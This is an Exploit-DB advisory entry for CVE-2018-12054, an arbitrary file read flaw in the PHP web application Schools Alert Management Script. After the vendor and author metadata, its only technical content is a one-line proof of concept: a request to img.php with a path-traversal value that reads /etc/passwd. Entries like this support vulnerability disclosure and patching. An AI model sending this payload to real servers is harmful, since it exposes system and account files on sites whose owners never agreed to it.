Schools Alert Management Script - Arbitrary File Read

EDB-ID: 44874
Author: M3@Pandas
Published: 2018-06-11
CVE: CVE-2018-12054
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-06-07 
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054

# Proof of Concept:

/img.php?f=/./etc/./passwd

Related Posts